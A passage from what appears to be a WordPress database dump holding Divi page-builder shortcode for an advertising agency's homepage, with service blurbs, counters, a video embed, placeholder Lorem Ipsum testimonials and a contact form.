body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 21:00:53','2020-07-06 21:00:53','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(260,1,'2020-07-06 21:02:17','2020-07-06 21:02:17','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency.An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Why choose 